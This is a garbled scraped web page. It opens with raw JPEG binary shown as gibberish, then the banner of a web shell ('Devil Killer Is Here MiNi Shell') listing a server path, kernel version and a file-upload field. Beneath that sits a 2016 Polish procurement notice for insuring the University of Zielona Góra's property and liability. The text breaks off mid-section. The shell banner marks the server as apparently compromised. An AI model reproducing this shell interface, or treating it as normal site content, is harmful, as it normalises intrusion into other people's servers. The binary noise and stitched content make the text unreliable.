JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160301/21245-N-2016.html

<p class="kh_header"><b>Zielona Góra: Ubezpieczenie mienia oraz odpowiedzialności cywilnej Uniwersytetu Zielonogórskiego</b><br>
<b>Numer ogłoszenia: 21245 - 2016; data zamieszczenia: 01.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Zielonogórski - Biuro Zarządzania Nieruchomościami i Obsługi Uczelni , ul. Licealna 9, 65-417 Zielona Góra, woj. lubuskie, tel. 68 3282505, faks 68 3282505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uz.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ubezpieczenie mienia oraz odpowiedzialności cywilnej Uniwersytetu Zielonogórskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa ubezpieczenia mienia od ognia i innych zdarzeń losowych, urządzeń i wyposażenia od kradzieży z włamaniem i rabunku oraz dewastacji, sprzętu elektronicznego od wszystkich ryzyk, szyb od stłuczenia oraz ubezpieczenie odpowiedzialności cywilnej ogólnej. Część 1 zamówienia: ubezpieczenie mienia od ognia i innych zdarzeń losowych, od kradzieży z włamaniem i rabunku oraz dewastacji, szyb od stłuczenia oraz ubezpieczenie odpowiedzialności cywilnej ogólnej. Część 2 zamówienia: ubezpieczenie sprzętu elektronicznego przenośnego Instytutu Budownictwa od wszystkich ryzyk.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust 1 pkt 6 ustawy Prawo zamówień publicznych w wysokości do 20% zamówienia podstawowego. W ramach zamówień uzupełniających Wykonawca obejmie ochroną ubezpieczeniową do ustalonego limitu, obok wymienionych w polisie wszelkie inwestycje oraz środki trwałe w dniu przejścia na Zamawiającego ryzyka z tym związanego, w szczególności w następujących przypadkach: 1) wzrostu wartości ubezpieczanego majątku, 2) nowo nabywanego mienia, 3)podwyższenia lub uzupełnienia skonsumowanych limitów sum ubezpieczenia/ gwarancyjnych, 4) zmiany ryzyka ubezpieczeniowego, 5) rozszerzenie zakresu ubezpieczenia na wniosek Zamawiającego i za zgodą Wykonawcy w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego nieprzewidzianego w SIWZ, 6) przedłużenia umowy ubezpieczenia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.52.00-5, 66.51.50.00-3, 66.51.51.00-4, 66.51.54.00-7, 66.51.64.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawcy ubiegający się o realizację zamówienia muszą, na dzień składania ofert, posiadać zezwolenie lub inny dokument uprawniający do prowadzenia działalności ubezpieczeniowej w zakresie objętym przedmiotem zamówienia posiadane zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r., poz. 1844 z p. zm.). 
Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunku zobowiązani są złożyć: 1) aktualne zezwolenie na prowadzenie  działalności ubezpieczeniowej wydane przez organ nadzoru zgodnie z przepisami ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r., poz. 1844 z p. zm.) lub inny dokument potwierdzający uprawnienia do prowadzenia działalności ubezpieczeniowej na terenie Polski w zakresie nie mniejszym niż to wynika z przedmiotu zamówienia - zgodnie z ustawą z dnia 11wrzesnia 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r., poz. 1844 z p. zm.). 2) oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu (wypełniony załącznik nr 7 do SIWZ). Ocena spełniania przez Wykonawców wszystkich warunków określonych w SIWZ będzie dokonywana na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów. Podane warunki przedstawiają konkretne wymagania, a dokumenty przedstawione przez Wykonawcę mają potwierdzać ich spełnienie. Do dalszego etapu zostaną zakwalifikowani Wykonawcy spełniający wszystkie warunki. Brak któregokolwiek z żądanych dokumentów, złożenie dokumentów nie potwierdzających spełnianie warunków, złożenie dokumentów zawierających błędy lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy i/lub odrzucenie oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie pozwalające na realizację zamówienia objętego przedmiotowym postępowaniem. Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunku zobowiązani są złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu (wypełniony załącznik nr 7 do SIWZ). Ocena spełniania przez Wykonawców wszystkich warunków określonych w SIWZ będzie dokonywana na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów. Podane warunki przedstawiają konkretne wymagania, a dokumenty przedstawione przez Wykonawcę mają potwierdzać ich spełnienie. Do dalszego etapu zostaną zakwalifikowani Wykonawcy spełniający wszystkie warunki. Brak któregokolwiek z żądanych dokumentów, złożenie dokumentów nie potwierdzających spełnianie warunków, złożenie dokumentów zawierających błędy lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy i/lub odrzucenie oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednim potencjałem technicznym do wykonania  zamówienia objętego przedmiotowym postępowaniem. Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunku zobowiązani są złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu (wypełniony załącznik nr 7 do SIWZ). Ocena spełniania przez Wykonawców wszystkich warunków określonych w SIWZ będzie dokonywana na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów. Podane warunki przedstawiają konkretne wymagania, a dokumenty przedstawione przez Wykonawcę mają potwierdzać ich spełnienie. Do dalszego etapu zostaną zakwalifikowani Wykonawcy spełniający wszystkie warunki. Brak któregokolwiek z żądanych dokumentów, złożenie dokumentów nie potwierdzających spełnianie warunków, złożenie dokumentów zawierających błędy lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy i/lub odrzucenie oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia objętego przedmiotowym postępowaniem. Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunku zobowiązani są złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu (wypełniony załącznik nr 7 do SIWZ). Ocena spełniania przez Wykonawców wszystkich warunków określonych w SIWZ będzie dokonywana na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów. Podane warunki przedstawiają konkretne wymagania, a dokumenty przedstawione przez Wykonawcę mają potwierdzać ich spełnienie. Do dalszego etapu zostaną zakwalifikowani Wykonawcy spełniający wszystkie warunki. Brak któregokolwiek z żądanych dokumentów, złożenie dokumentów nie potwierdzających spełnianie warunków, złożenie dokumentów zawierających błędy lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy i/lub odrzucenie oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej  pozwalającej na realizację zamówienia objętego przedmiotowym postępowaniem.
Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunków muszą wykazać, że: 1) posiadają pokrycie marginesu wypłacalności środkami własnymi powyżej 100%, o którym mowa w ustawie z dnia 22 maja 2003 r. o działalności ubezpieczeniowej (t. jedn. Dz. U. 2013 r., poz. 950 z p. zm.) oraz na podstawie rozporządzenia  Ministra Finansów z dnia 28 listopada 2003 r. w sprawie sposobu wyliczenia wysokości marginesu wypłacalności oraz minimalnej wysokości kapitału gwarancyjnego dla działów i grup ubezpieczeń (Dz.U. z 2003 r.  Nr 211, poz. 2060). O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają pokrycie marginesu wypłacalności środkami własnymi na poziomie powyżej 100% - najdalej wg stanu na dzień 30.06.2015 roku. 2) posiadają kapitały własne w wysokości nie mniejszej niż 30.000.000,00 zł najdalej wg stanu na dzień 30.06.2015 roku. Wykonawcy ubiegający się o realizację zamówienia w celu wykazania spełniania warunku zobowiązani są złożyć: 1) oświadczenie Wykonawcy o posiadaniu pokrycia marginesu wypłacalności środkami własnymi na poziomie powyżej 100% i wysokości kapitałów własnych (wypełniony załącznik nr 10 do SIWZ), 2) oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu (wypełniony załącznik nr 7 do SIWZ). Jeśli Wykonawcy będą wykazywali spełnianie wymaganych warunków przy pomocy dokumentów zawierających wartości przedstawione w walutach obcych podczas oceny takich ofert Zamawiający będzie przeliczał waluty obce na złote (PLN) wg średniego kursu Narodowego Banku Polskiego danej waluty z dnia zamieszczenia ogłoszenia o przedmiotowym zamówieniu w Biuletynie Zamówień Publicznych. Ocena spełniania przez Wykonawców wszystkich warunków określonych w SIWZ będzie dokonywana na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów. Podane warunki przedstawiają konkretne wymagania, a dokumenty przedstawione przez Wykonawcę mają potwierdzać ich spełnienie. Do dalszego etapu zostaną zakwalifikowani Wykonawcy spełniający wszystkie warunki. Brak któregokolwiek z żądanych dokumentów, złożenie dokumentów nie potwierdzających spełnianie warunków, złożenie dokumentów zawierających błędy lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy i/lub odrzucenie oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>wypełniony Formularz Oświadczenie Wykonawcy o posiadaniu pokrycia marginesu wypłacalności środkami własnymi na poziomie powyżej 100% i wysokości kapitałów własnych - załącznik nr 10 do SIWZ;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniony/e formularz/e Wymagany obligatoryjnie zakres ubezpieczenia stanowiące odpowiednio załączniki nr 3A, 3B do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu wykazania przez Wykonawcę spełniania warunków udziału w postępowaniu, określonych na podstawie art. 22 ust. 1,  do oferty należy dołączyć:
1) wypełniony Formularz Oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu - załącznik nr 7 do SIWZ; 2) aktualne zezwolenie na prowadzenie działalności ubezpieczeniowej wydane przez organ nadzoru zgodnie z przepisami ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r., poz. 1844 z p. zm.) lub inny dokument potwierdzający uprawnienia do prowadzenia działalności ubezpieczeniowej na terenie Polski w zakresie nie mniejszym niż to wynika z przedmiotu zamówienia - zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r., poz. 1844 z p. zm.); 3) wypełniony Formularz Oświadczenie Wykonawcy o posiadaniu pokrycia marginesu wypłacalności środkami własnymi na poziomie powyżej 100% i wysokości kapitałów własnych - załącznik nr 10 do SIWZ. UWAGA!!! jeśli Zamawiający stawia powyżej warunki udziału w postępowaniu i żąda przedstawienia dokumentów na potwierdzenie ich spełniania, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231 z p. zm.) zwanego dalej Rozporządzeniem: 1) Dowodami poświadczającymi, że roboty budowlane zostały wykonane w sposób należyty (w tym zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone), a dostawy i usługi zostały wykonane lub są wykonywane należycie są: a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, b)	w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej w lit.a), c) w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej w lit. a); 2) W przypadku, gdy Zamawiający jest podmiotem na rzecz którego roboty budowlane, dostawy lub usługi wskazane w wykazie, o którym mowa w §1 ust. 1 pkt 2 lub 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231 z p. zm.), zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej w pkt. 1) Uwagi, tzn. dowodów poświadczających, że roboty budowlane zostały wykonane w sposób należyty (w tym zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone), a dostawy i usługi zostały wykonane lub są wykonywane należycie. 3) Jeśli Wykonawca wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy (jeśli Zamawiający stawia powyżej takie warunki i żąda dokumentów na potwierdzenie ich spełniania) polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Wykonawca zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował niezbędnymi zasobami innego podmiotu, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie podmiotów trzecich do udostępnienia zasobów winno być zawsze składane w formie pisemnej (w oryginale). Nie może to być kopia potwierdzona za zgodność z oryginałem przez Wykonawcę (dokumenty wynikające z art. 26 ust. 2b ustawy należy składać w oryginale). W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda: a) w przypadku warunków, o których mowa w art. 22 ust.1 pkt 4 ustawy - dokumentów o których mowa w ust.1 pkt 9-11 Rozporządzenia (jeśli Zamawiający żąda powyżej tych dokumentów), a także innych dokumentów dotyczących sytuacji ekonomicznej i finansowej określonych w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia; b) dokumentów dotyczących w szczególności: a)	zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia. 4) Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego (jeśli Zamawiający żąda powyżej tych dokumentów), może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku. 2. W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom Zamawiającego do oferty należy dołączyć: wypełniony/e formularz/e Wymagany obligatoryjnie zakres ubezpieczenia - odpowiednio załączniki nr 3A i 3B do SIWZ. 
3. Ponadto do oferty należy dołączyć następujące dokumenty: 1) wypełniony Formularz OFERTA - załącznik nr 2 do SIWZ; 2) wypełniony/e Formularz składkowy/Formularze składkowe - odpowiednio załączniki nr 5A, 5B do SIWZ; 3) wypełniony formularz/formularze Fakultatywne warunki ubezpieczenia - odpowiednio załączniki nr 4A, 4B do SIWZ; 4) Wypełniony Formularz Informacja Wykonawcy w zakresie przynależności do grupy kapitałowej - załącznik nr 8 do SIWZ; Na mocy art. 26 ust. 2d ustawy, Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, albo informację o tym, że nie należy do grupy kapitałowej; 5) o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą należy dołączyć do oferty stosowne pełnomocnictwo, 6) jeśli Wykonawca zastrzegł w ofercie, że jakieś informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, do oferty należy dołączyć wypełniony Formularz Wykazanie zasadności zastrzeżenia informacji jako tajemnicy przedsiębiorstwa - załącznik nr 15 do SIWZ, z koniecznymi zdaniem Wykonawcy załącznikami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Fakultatywne warunki ubezpieczenia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
